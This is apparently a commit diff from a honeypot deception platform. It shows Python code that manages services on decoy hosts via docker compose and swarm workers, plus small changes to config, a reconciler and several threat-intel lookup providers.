    """Regenerate the fleet compose file via ``decnet.composer.write_compose``.

    The composer's return value is intentionally discarded.
    """
    from decnet.composer import write_compose as render_compose

    render_compose(config, compose_path)
def _get_bus():
    """Return the bus object from ``decnet.bus.factory.get_bus`` (lazy import)."""
    from decnet.bus.factory import get_bus as make_bus

    bus = make_bus()
    return bus
# --------------------------- swarm propagation helpers ---------------------------
#
# Service mutations (add/remove/update_config) on a deployed decky used to run
# the master's local docker-compose only. For swarm fleet deckies the master
# has no containers; for agent-targeted topologies the master only writes a
# compose file the worker never sees. These helpers replay the change to the
# worker so the env actually lands.
#
# Lazy imports keep this module's import graph clean (composer/swarm pull in
# decnet.network → docker, mirroring the pattern used elsewhere in this file).
async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
"""Return ``host_uuid`` if a fleet decky lives on a swarm worker, else None."""
shards = await repo.list_decky_shards()
for s in shards:
if s.get("decky_name") == decky_name:
return s.get("host_uuid")
return None
async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
    """Re-send the deckies belonging to *host_uuid* to that host's worker.

    Loads the master's fleet state, keeps only the deckies whose
    ``host_uuid`` attribute equals *host_uuid*, and hands a copy of the
    config holding just those deckies to ``dispatch_decnet_config``.
    Logs a warning and returns without dispatching when there is no fleet
    state or no decky for that host.
    """
    from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config

    loaded = _load_state()
    if loaded is None:
        log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
        return

    fleet_config, _ = loaded
    shard = []
    for candidate in fleet_config.deckies:
        if getattr(candidate, "host_uuid", None) == host_uuid:
            shard.append(candidate)

    if not shard:
        log.warning(
            "redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
            host_uuid,
        )
        return

    shard_config = fleet_config.model_copy(update={"deckies": shard})
    await dispatch_decnet_config(shard_config, repo)
async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
    """Push the topology to its worker, but only when it is agent-pinned.

    A topology counts as agent-pinned when its hydrated ``topology`` dict
    carries a truthy ``target_host_uuid``. Missing topologies and unihost
    topologies (local compose is authoritative) are silently skipped.
    """
    from decnet.engine.deployer import resync_agent_topology as push_to_agent

    snapshot = await hydrate(repo, topology_id)
    pinned_host = (
        None
        if snapshot is None
        else snapshot.get("topology", {}).get("target_host_uuid")
    )
    if pinned_host:
        await push_to_agent(repo, topology_id)
# Module logger. It is bound after some helpers above that reference ``log``;
# that is fine because those helpers only look the name up when called.
log = get_logger("engine.services_live")
# Scope discriminator accepted by the public add/update/remove entry points.
DeckyKind = Literal["fleet", "topology"]
class ServiceMutationError(ValueError):
    """Base error for service-mutation failures the caller can correct.

    The API layer picks a 4xx status from the concrete subclass; this base
    class itself maps to 422.
    """
class ServiceNotFoundError(ServiceMutationError):
    """The referenced decky or topology does not exist (maps to 404)."""
class ServiceConflictError(ServiceMutationError):
    """The service is already on, or not on, the decky (maps to 409)."""
def _validate_service_for_per_decky(name: str) -> BaseService:
    """Return the registered service for *name* or raise ``ServiceMutationError``.

    ``fleet_singleton`` services run once per fleet (e.g. an LLMNR
    responder), not per-decky — the per-decky add/remove request is
    rejected rather than silently producing a no-op compose entry.

    Args:
        name: Registry key of the service.

    Returns:
        The registered service object.

    Raises:
        ServiceMutationError: If the service is unknown or is a
            ``fleet_singleton``.
    """
    try:
        svc = get_service(name)
    except KeyError as exc:
        raise ServiceMutationError(f"unknown service {name!r}") from exc
    # Other callers of get_service in this codebase guard against a ``None``
    # result, so treat that as "unknown" too instead of failing later with
    # AttributeError on ``svc.fleet_singleton``.
    if svc is None:
        raise ServiceMutationError(f"unknown service {name!r}")
    if svc.fleet_singleton:
        raise ServiceMutationError(
            f"service {name!r} is fleet_singleton; not addable per-decky"
        )
    return svc
async def _publish(topic: str, payload: dict[str, Any]) -> None:
    """Best-effort bus publish: connect, publish one message, close.

    Never raises — any failure is logged as a warning. Once ``connect()``
    has succeeded the bus is always closed, even if ``publish()`` raises,
    so a failed publish cannot leak the connection.

    Args:
        topic: Bus topic to publish on.
        payload: Message body.
    """
    try:
        bus = _get_bus()
        await bus.connect()
        try:
            await bus.publish(topic, payload)
        finally:
            # Runs on both success and publish failure; a close() error is
            # caught by the outer handler like any other bus failure.
            await bus.close()
    except Exception as e:  # noqa: BLE001
        log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
# ---------------------------------------------------------- topology path
async def _topology_decky(
    repo: BaseRepository, topology_id: str, decky_name: str,
) -> dict[str, Any]:
    """Return the hydrated decky row named *decky_name* in *topology_id*.

    A row's name is ``decky_config["name"]`` when present and truthy,
    otherwise the row's own ``name``. The first matching row wins.

    Raises:
        ServiceNotFoundError: If the topology cannot be hydrated or has no
            decky with that name.
    """
    snapshot = await hydrate(repo, topology_id)
    if snapshot is None:
        raise ServiceNotFoundError(f"topology {topology_id!r} not found")

    def _row_name(row):
        return (row.get("decky_config") or {}).get("name") or row.get("name")

    match = next(
        (row for row in snapshot["deckies"] if _row_name(row) == decky_name),
        None,
    )
    if match is not None:
        return match
    raise ServiceNotFoundError(
        f"decky {decky_name!r} is not in topology {topology_id!r}"
    )
async def _rerender_topology_compose(
    repo: BaseRepository, topology_id: str,
) -> Path:
    """Hydrate the topology again and rewrite its compose file.

    Run after a DB update so the file on disk matches the stored service
    set; otherwise a later ``up -d`` would act on the stale description
    (for example bringing back a removed service).

    Returns:
        The path of the per-topology compose file.

    Raises:
        ServiceNotFoundError: If the topology can no longer be hydrated.
    """
    snapshot = await hydrate(repo, topology_id)
    if snapshot is None:  # pragma: no cover — narrow race
        raise ServiceNotFoundError(
            f"topology {topology_id!r} disappeared mid-mutation"
        )
    compose_path = _topology_compose_path(topology_id)
    _write_topology_compose(snapshot, compose_path)
    return compose_path
async def _add_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
) -> list[str]:
    """Add *service_name* to a topology decky and bring its container up.

    Steps, in order: reject duplicates, persist the extended services list
    (plus ``decky_config.service_config[service_name]`` when
    *initial_config* is truthy), re-render the compose file, then either
    resync the worker (agent-pinned topology) or run a targeted
    ``compose up`` locally in a worker thread.

    Returns:
        The services list after the addition.

    Raises:
        ServiceNotFoundError: Unknown topology or decky.
        ServiceConflictError: The service is already on the decky.
    """
    decky_row = await _topology_decky(repo, topology_id, decky_name)
    current = list(decky_row.get("services") or [])
    if service_name in current:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )

    updated_services: list[str] = [*current, service_name]
    changes: dict[str, Any] = {"services": updated_services}

    # Fold the initial config in before the compose regen so the very first
    # ``up`` already carries the env — no follow-up apply needed.
    if initial_config:
        blob = dict(decky_row.get("decky_config") or {})
        blob["service_config"] = {
            **(blob.get("service_config") or {}),
            service_name: initial_config,
        }
        changes["decky_config"] = blob

    await repo.update_topology_decky(decky_row["uuid"], changes)
    compose_path = await _rerender_topology_compose(repo, topology_id)

    if not await _topology_is_agent_pinned(repo, topology_id):
        container = f"{decky_name}-{service_name}"

        def _bring_up() -> None:
            _compose(
                "up", "-d", "--no-deps", "--build", container,
                compose_file=compose_path,
            )

        # Compose is blocking; run it off the event loop.
        await anyio.to_thread.run_sync(_bring_up)
    else:
        # Agent-pinned: nothing to start locally, push the blob to the worker.
        await _resync_agent_topology(repo, topology_id)
    return updated_services
async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
    """Tell whether the topology has a truthy ``target_host_uuid``.

    Returns ``False`` when the topology cannot be hydrated.
    """
    snapshot = await hydrate(repo, topology_id)
    return snapshot is not None and bool(
        snapshot.get("topology", {}).get("target_host_uuid")
    )
async def _remove_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
) -> list[str]:
    """Remove *service_name* from a topology decky.

    For a local (non agent-pinned) topology the container is stopped and
    removed *before* anything is persisted, so a compose failure leaves the
    DB still saying the service is on and the operator can simply retry.
    For an agent-pinned topology the DB and compose file are updated first
    and the worker is resynced afterwards.

    Returns:
        The services list after the removal.

    Raises:
        ServiceNotFoundError: Unknown topology or decky.
        ServiceConflictError: The service is not on the decky.
    """
    decky_row = await _topology_decky(repo, topology_id, decky_name)
    current = list(decky_row.get("services") or [])
    if service_name not in current:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )

    remaining: list[str] = [name for name in current if name != service_name]
    container = f"{decky_name}-{service_name}"
    compose_path = _topology_compose_path(topology_id)
    pinned = await _topology_is_agent_pinned(repo, topology_id)

    if not pinned:
        def _stop() -> None:
            _compose("stop", container, compose_file=compose_path)

        def _rm() -> None:
            _compose("rm", "-f", container, compose_file=compose_path)

        await anyio.to_thread.run_sync(_stop)
        await anyio.to_thread.run_sync(_rm)

    await repo.update_topology_decky(decky_row["uuid"], {"services": remaining})
    await _rerender_topology_compose(repo, topology_id)

    if pinned:
        # The worker receives the new hydrated blob via the resync.
        await _resync_agent_topology(repo, topology_id)
    return remaining
# ---------------------------------------------------------- fleet path
def _fleet_state_or_raise() -> tuple[Any, Path]:
    """Return the loaded fleet state, insisting that one exists.

    Raises:
        ServiceMutationError: If ``_load_state()`` returns ``None``.
    """
    loaded = _load_state()
    if loaded is not None:
        return loaded
    raise ServiceMutationError(
        "no fleet state on disk — run `decnet up` first"
    )
def _fleet_find_decky(config: Any, decky_name: str) -> Any:
for d in config.deckies:
if d.name == decky_name:
return d
raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
async def _persist_fleet_change(
    repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
) -> None:
    """Persist a fleet decky mutation to JSON state, compose file, and DB row.

    State is re-read so the write applies to the current on-disk config.
    Because the reloaded decky may be a different object from *decky*, any
    ``service_config`` the caller set on *decky* (e.g. the initial config
    stashed by an add) is copied onto the reloaded decky; without that the
    new config would be dropped from the state file, the compose file and
    the DB row.

    Args:
        repo: Repository used to mirror the change into the fleet table.
        decky: The caller's decky object; supplies ``name``, ``ip``,
            ``host_uuid`` and any pending ``service_config``.
        services: The post-mutation services list.
        compose_path: Fleet compose file to regenerate.

    Raises:
        ServiceMutationError: If fleet state is missing.
        ServiceNotFoundError: If the decky is absent from the reloaded state.
    """
    # Fails with a clear error rather than a TypeError on tuple-unpacking None.
    config, _ = _fleet_state_or_raise()
    target = _fleet_find_decky(config, decky.name)
    target.services = services

    pending_cfg = getattr(decky, "service_config", None)
    if target is not decky and pending_cfg is not None:
        target.service_config = dict(pending_cfg)

    _save_state(config, compose_path)
    _write_compose(config, compose_path)

    # Mirror to the DB row so DB-only consumers (dashboard, API) see the
    # change without waiting for the reconciler.
    from decnet.web.db.models import LOCAL_HOST_SENTINEL

    await repo.upsert_fleet_decky({
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": services,
        "decky_config": target.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    })
async def _add_fleet_service(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
) -> list[str]:
    """Add *service_name* to a fleet decky and materialise its container.

    Persists the extended services list, then either re-dispatches the
    host's shard (decky lives on a swarm worker) or runs a targeted
    ``compose up`` locally in a worker thread.

    Returns:
        The services list after the addition.

    Raises:
        ServiceMutationError: No fleet state on disk.
        ServiceNotFoundError: Unknown decky.
        ServiceConflictError: The service is already on the decky.
    """
    fleet_config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(fleet_config, decky_name)

    current = list(decky.services or [])
    if service_name in current:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    updated_services: list[str] = [*current, service_name]

    if initial_config:
        # Stash the validated cfg on the decky model ahead of the persist
        # step. NOTE(review): _persist_fleet_change reloads state itself —
        # confirm this assignment reaches the config it writes.
        merged = dict(getattr(decky, "service_config", None) or {})
        merged[service_name] = initial_config
        decky.service_config = merged

    await _persist_fleet_change(repo, decky, updated_services, compose_path)

    worker_host = await _fleet_decky_host_uuid(repo, decky_name)
    if not worker_host:
        container = f"{decky_name}-{service_name}"

        def _bring_up() -> None:
            _compose(
                "up", "-d", "--no-deps", "--build", container,
                compose_file=compose_path,
            )

        await anyio.to_thread.run_sync(_bring_up)
    else:
        # The decky lives on a worker: re-push that host's shard instead.
        await _redispatch_fleet_shard(repo, worker_host)
    return updated_services
async def _remove_fleet_service(
    repo: BaseRepository, decky_name: str, service_name: str,
) -> list[str]:
    """Remove *service_name* from a fleet decky.

    Local decky: the container is stopped and removed before persisting, so
    a compose failure leaves a clear state to retry from. Swarm decky: the
    change is persisted and the host's shard is re-dispatched afterwards.

    Returns:
        The services list after the removal.

    Raises:
        ServiceMutationError: No fleet state on disk.
        ServiceNotFoundError: Unknown decky.
        ServiceConflictError: The service is not on the decky.
    """
    fleet_config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(fleet_config, decky_name)

    current = list(decky.services or [])
    if service_name not in current:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    remaining: list[str] = [name for name in current if name != service_name]
    container = f"{decky_name}-{service_name}"

    worker_host = await _fleet_decky_host_uuid(repo, decky_name)
    runs_locally = not worker_host

    if runs_locally:
        def _stop() -> None:
            _compose("stop", container, compose_file=compose_path)

        def _rm() -> None:
            _compose("rm", "-f", container, compose_file=compose_path)

        await anyio.to_thread.run_sync(_stop)
        await anyio.to_thread.run_sync(_rm)

    await _persist_fleet_change(repo, decky, remaining, compose_path)

    if not runs_locally:
        await _redispatch_fleet_shard(repo, worker_host)
    return remaining
# ---------------------------------------------------------- public api
async def add_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
    config: dict | None = None,
) -> list[str]:
    """Add *service_name* to a deployed decky and announce it on the bus.

    The service name is checked against the registry (unknown and
    ``fleet_singleton`` names are rejected) and a truthy ``config`` is
    passed through the service's ``validate_cfg`` before any state is
    written. The fleet or topology helper then persists the change and
    starts the container, and ``decky.<name>.service.added`` is published.

    Args:
        repo: Repository handle.
        decky_kind: ``"fleet"`` or ``"topology"``.
        decky_name: Target decky.
        service_name: Service to add.
        topology_id: Required when ``decky_kind`` is ``"topology"``.
        config: Optional initial service config.

    Returns:
        The post-mutation services list.

    Raises:
        ServiceMutationError: Invalid service, missing ``topology_id``, or
            an unknown ``decky_kind`` (including its not-found/conflict
            subclasses raised by the helpers).
    """
    registered = _validate_service_for_per_decky(service_name)
    seed_cfg = {}
    if config:
        seed_cfg = registered.validate_cfg(config)

    if decky_kind == "fleet":
        services = await _add_fleet_service(
            repo, decky_name, service_name,
            initial_config=seed_cfg,
        )
    elif decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _add_topology_service(
            repo, topology_id, decky_name, service_name,
            initial_config=seed_cfg,
        )
    else:  # pragma: no cover — Literal narrows
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    event = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "services": services,
    }
    await _publish(topics.decky(decky_name, topics.DECKY_SERVICE_ADDED), event)
    log.info(
        "services_live.add decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services
async def update_service_config(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    cfg: dict,
    apply: bool = False,
    topology_id: Optional[str] = None,
) -> dict:
    """Store *cfg* as ``service_config[service_name]`` for a decky.

    *cfg* goes through the service's ``validate_cfg`` before any write, so
    a validation failure has no side effects.

    ``apply=False`` (Save) only persists the config and compose file; the
    running container keeps its old env. ``apply=True`` (Apply) also
    force-recreates ``<decky>-<service>`` so the new env takes effect —
    destructive for any in-container session state of that service.

    Publishes ``DECKY_SERVICE_CONFIG_CHANGED`` with ``recreated`` set to
    ``bool(apply)``.

    Returns:
        The validated config.

    Raises:
        ServiceMutationError: Invalid service, missing ``topology_id``, or
            an unknown ``decky_kind`` (including subclasses raised by the
            helpers).
    """
    registered = _validate_service_for_per_decky(service_name)
    validated = registered.validate_cfg(cfg)

    if decky_kind == "fleet":
        await _update_fleet_service_config(
            repo, decky_name, service_name, validated, apply=apply,
        )
    elif decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        await _update_topology_service_config(
            repo, topology_id, decky_name, service_name, validated, apply=apply,
        )
    else:  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    event = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "service_config": validated,
        "recreated": bool(apply),
    }
    await _publish(
        topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED), event,
    )
    log.info(
        "services_live.update_config decky=%s topology=%s service=%s apply=%s",
        decky_name, topology_id, service_name, apply,
    )
    return validated
async def _update_topology_service_config(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
) -> None:
    """Write *validated* into a topology decky's ``service_config``.

    Always updates the DB row and re-renders the compose file. When
    *apply* is true it additionally resyncs the worker (agent-pinned) or
    force-recreates the service container locally.

    Raises:
        ServiceNotFoundError: Unknown topology or decky.
        ServiceConflictError: The service is not on the decky.
    """
    decky_row = await _topology_decky(repo, topology_id, decky_name)
    if service_name not in (decky_row.get("services") or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )

    blob = dict(decky_row.get("decky_config") or {})
    blob["service_config"] = {
        **(blob.get("service_config") or {}),
        service_name: validated,
    }
    await repo.update_topology_decky(decky_row["uuid"], {"decky_config": blob})
    compose_path = await _rerender_topology_compose(repo, topology_id)

    if not apply:
        return

    if await _topology_is_agent_pinned(repo, topology_id):
        await _resync_agent_topology(repo, topology_id)
        return

    container = f"{decky_name}-{service_name}"

    def _recreate() -> None:
        _compose(
            "up", "-d", "--no-deps", "--force-recreate", "--build", container,
            compose_file=compose_path,
        )

    await anyio.to_thread.run_sync(_recreate)
async def _update_fleet_service_config(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
) -> None:
    """Write *validated* into a fleet decky's ``service_config``.

    Always saves the JSON state, regenerates the compose file and upserts
    the fleet DB row. When *apply* is true it additionally re-dispatches
    the host's shard (swarm decky) or recreates the container locally.

    Raises:
        ServiceMutationError: No fleet state on disk.
        ServiceNotFoundError: Unknown decky.
        ServiceConflictError: The service is not on the decky.
    """
    fleet_config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(fleet_config, decky_name)
    if service_name not in (decky.services or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )

    merged = dict(getattr(decky, "service_config", None) or {})
    merged[service_name] = validated
    decky.service_config = merged

    _save_state(fleet_config, compose_path)
    _write_compose(fleet_config, compose_path)

    from decnet.web.db.models import LOCAL_HOST_SENTINEL

    row = {
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": list(decky.services or []),
        "decky_config": decky.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    }
    await repo.upsert_fleet_decky(row)

    if not apply:
        return

    worker_host = await _fleet_decky_host_uuid(repo, decky_name)
    if worker_host:
        await _redispatch_fleet_shard(repo, worker_host)
        return

    container = f"{decky_name}-{service_name}"

    def _force_remove():
        # Docker Compose tracks the previous container by ID. If that
        # container is already gone (or was renamed by a failed deploy),
        # --force-recreate fails with "No such container"; removing by
        # name first gives Compose a clean slate. The result is ignored.
        return subprocess.run(  # nosec B603 B607
            ["docker", "rm", "-f", container],
            capture_output=True,
        )

    def _recreate() -> None:
        _compose(
            "up", "-d", "--no-deps", "--force-recreate", "--build", container,
            compose_file=compose_path,
        )

    await anyio.to_thread.run_sync(_force_remove)
    await anyio.to_thread.run_sync(_recreate)
async def remove_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
) -> list[str]:
    """Remove *service_name* from a deployed decky and announce it on the bus.

    Delegates to the fleet or topology helper, which takes the container
    down, persists the shortened services list and re-renders the compose
    file (so the next ``up -d`` doesn't bring the service back). Afterwards
    ``decky.<name>.service.removed`` is published.

    Returns:
        The post-mutation services list.

    Raises:
        ServiceMutationError: Missing ``topology_id`` or an unknown
            ``decky_kind`` (including subclasses raised by the helpers).
    """
    if decky_kind == "fleet":
        services = await _remove_fleet_service(repo, decky_name, service_name)
    elif decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _remove_topology_service(
            repo, topology_id, decky_name, service_name,
        )
    else:  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    event = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "services": services,
    }
    await _publish(topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED), event)
    log.info(
        "services_live.remove decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services

View File

@@ -91,7 +91,7 @@ DECNET_API_PORT: int = _port("DECNET_API_PORT", 8000)
# DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
# updater / swarmctl subcommands (which never touch auth) can start without
# the master's JWT secret being present in the environment.
DECNET_INGEST_LOG_FILE: str = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
DECNET_INGEST_LOG_FILE: str | None = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
# Agent-side RFC 5424 sink written by decnet.collector.worker when run on
# a SWARM worker. The forwarder tails this file and ships lines over
@@ -114,11 +114,6 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
# Bind address for the master-side swarm controller. Loopback by default —
# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
# swarmctl-host in /etc/decnet/decnet.ini.
DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
# Ingester batching: how many log rows to accumulate per commit, and the
# max wait (ms) before flushing a partial batch. Larger batches reduce

View File

@@ -128,6 +128,8 @@ async def reconcile_once(
container_states = await asyncio.to_thread(
_collect_container_states, docker_client_factory,
)
docker_known = container_states is not None
json_names = {d.name for d in json_deckies}
# 1. INSERT: present in JSON, absent from DB.
@@ -136,7 +138,7 @@ async def reconcile_once(
continue
new_state = (
_aggregate_decky_state(d.name, list(d.services), container_states)
if container_states is not None else "running"
if docker_known else "running"
)
row_host = d.host_uuid or host_uuid
await repo.upsert_fleet_decky({
@@ -166,7 +168,7 @@ async def reconcile_once(
)
# 3. STATE: present in both, docker says something fresh.
if container_states is not None:
if docker_known:
for d in json_deckies:
existing = db_by_name.get(d.name)
if existing is None:

View File

@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
from decnet.geoip.lookup import Lookup
from decnet.geoip.paths import ensure_root
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
from decnet.geoip.rir.parse import Range, parse_file
from decnet.geoip.rir.parse import parse_file
logger = logging.getLogger("decnet.geoip.rir.provider")
@@ -45,7 +45,7 @@ class RirProvider(Provider):
except Exception as exc:
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
ranges: list[Range] = []
ranges = []
for path in self.data_paths():
if not path.exists():
continue

View File

@@ -17,6 +17,7 @@ later if operators report drift.
"""
from __future__ import annotations
import json
import os
from datetime import datetime, timezone
from typing import Optional
@@ -92,25 +93,12 @@ class AbuseIPDBProvider(IntelProvider):
data = payload.get("data") or {}
score = int(data.get("abuseConfidenceScore") or 0)
verdict = _score_to_verdict(score)
# AbuseIPDB returns ``data.reports[*].categories`` — a list of
# int codes per report. Flatten the union across all recent
# reports so the IntelLifter sees the full activity profile,
# not just the most-recent report's categories. Sorted for
# determinism (matters for tests + for the bus payload diff).
categories: set[int] = set()
for report in data.get("reports") or []:
if not isinstance(report, dict):
continue
for cat in report.get("categories") or []:
if isinstance(cat, int):
categories.add(cat)
return IntelResult(
provider=self.name,
verdict=verdict,
column_updates={
"abuseipdb_score": score,
"abuseipdb_categories": sorted(categories),
"abuseipdb_raw": data,
"abuseipdb_raw": json.dumps(data),
"abuseipdb_queried_at": datetime.now(timezone.utc),
},
)

View File

@@ -78,33 +78,3 @@ class IntelProvider(ABC):
entire IP. Implementations should also respect
``self._semaphore`` to bound in-flight calls.
"""
class MalHashProvider(ABC):
    """Abstract lookup for known-bad file hashes.

    A sibling of :class:`IntelProvider` rather than a subclass: it is keyed
    by file SHA-256 instead of IP and is consumed by the email ingester at
    observation time, not by the IP-keyed intel-worker fan-out. Keeping it
    a separate ABC leaves ``IntelProvider.lookup(ip)`` semantically honest.

    Current implementation:

    * :class:`decnet.intel.mal_hash.MalwareBazaarProvider` — a bulk-feed
      provider shaped like :class:`decnet.intel.feodo.FeodoProvider`.

    Further implementations (a paid VirusTotal subscription, an in-house
    allowlist) are meant to plug in behind
    :func:`decnet.intel.factory.get_mal_hash_provider`.
    """

    # Short provider identifier; concrete subclasses set it.
    name: str

    @abstractmethod
    async def is_known_bad(self, sha256: str) -> bool:
        """Report whether *sha256* appears on this provider's bad-hash list.

        Implementations MUST NOT raise: on any error they return ``False``
        and log the problem themselves. The caller is the ingester, so an
        exception here would taint an unrelated bus payload.
        """

View File

@@ -21,7 +21,7 @@ from __future__ import annotations
import os
from typing import List
from decnet.intel.base import IntelProvider, MalHashProvider
from decnet.intel.base import IntelProvider
_KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")
@@ -37,40 +37,6 @@ def _provider_list() -> list[str]:
return [p.strip().lower() for p in raw.split(",") if p.strip()]
_mal_hash_singleton: MalHashProvider | None = None
_mal_hash_initialized: bool = False
def get_mal_hash_provider() -> MalHashProvider | None:
    """Return the process-wide malware-hash provider, building it once.

    Counterpart of :func:`get_intel_providers` for the SHA-256 keyspace
    (consumed by the email ingester, not the IP-keyed intel worker).

    The result is ``None`` only when intel is disabled as a whole.
    Otherwise a :class:`MalwareBazaarProvider` is returned; it turns
    itself into a no-op when ``DECNET_MALWAREBAZAAR_AUTH_KEY`` is unset,
    so the ingester needs no "no provider configured" special case.
    """
    global _mal_hash_singleton, _mal_hash_initialized
    if not _mal_hash_initialized:
        # Flip the flag first: even if construction below fails, later
        # calls return the cached value instead of retrying.
        _mal_hash_initialized = True
        if _enabled():
            # Imported lazily so the factory module stays cheap to import.
            from decnet.intel.mal_hash import MalwareBazaarProvider

            _mal_hash_singleton = MalwareBazaarProvider()
        else:
            _mal_hash_singleton = None
    return _mal_hash_singleton
def _reset_mal_hash_provider_for_testing() -> None:
"""Test hook — drop the singleton so the next call re-reads env."""
global _mal_hash_singleton, _mal_hash_initialized
_mal_hash_singleton = None
_mal_hash_initialized = False
def get_intel_providers() -> List[IntelProvider]:
"""Return the configured threat-intel providers.

View File

@@ -13,6 +13,7 @@ of attacker IPs map to a single network round-trip per refresh window.
"""
from __future__ import annotations
import json
import time
from datetime import datetime, timezone
from typing import Any, Optional
@@ -92,22 +93,16 @@ class FeodoProvider(IntelProvider):
verdict=None, # absence ≠ "benign", let other providers speak
column_updates={
"feodo_listed": False,
"feodo_malware_family": None,
"feodo_raw": {},
"feodo_raw": "{}",
"feodo_queried_at": datetime.now(timezone.utc),
},
)
family_obj = entry.get("malware")
family = (
family_obj if isinstance(family_obj, str) and family_obj else None
)
return IntelResult(
provider=self.name,
verdict="malicious",
column_updates={
"feodo_listed": True,
"feodo_malware_family": family,
"feodo_raw": entry,
"feodo_raw": json.dumps(entry),
"feodo_queried_at": datetime.now(timezone.utc),
},
)

View File

@@ -25,6 +25,7 @@ Status code semantics:
"""
from __future__ import annotations
import json
import os
from datetime import datetime, timezone
from typing import Optional
@@ -70,9 +71,7 @@ class GreyNoiseProvider(IntelProvider):
verdict="unknown",
column_updates={
"greynoise_classification": "unknown",
"greynoise_name": None,
"greynoise_tags": [],
"greynoise_raw": {"message": "not seen"},
"greynoise_raw": json.dumps({"message": "not seen"}),
"greynoise_queried_at": datetime.now(timezone.utc),
},
)
@@ -89,25 +88,12 @@ class GreyNoiseProvider(IntelProvider):
classification = (data.get("classification") or "unknown").lower()
verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
# The Community endpoint surfaces an actor ``name`` (e.g. "Tor",
# "Censys") but no behavioral tag list — the tag taxonomy is
# paid-tier only. Persist whatever we got; a future non-Community
# provider may populate ``greynoise_tags``.
name_obj = data.get("name")
name = name_obj if isinstance(name_obj, str) and name_obj else None
tags_obj = data.get("tags")
tags: list[str] = (
[t for t in tags_obj if isinstance(t, str)]
if isinstance(tags_obj, list) else []
)
return IntelResult(
provider=self.name,
verdict=verdict,
column_updates={
"greynoise_classification": classification,
"greynoise_name": name,
"greynoise_tags": tags,
"greynoise_raw": data,
"greynoise_raw": json.dumps(data),
"greynoise_queried_at": datetime.now(timezone.utc),
},
)

View File

@@ -1,195 +0,0 @@
"""MalwareBazaar bad-hash provider — bulk SHA-256 feed.
Mirrors :mod:`decnet.intel.feodo` for the refresh / TTL / set-membership
shape, but operates on the SHA-256 keyspace instead of IPs and so
implements :class:`decnet.intel.base.MalHashProvider` rather than
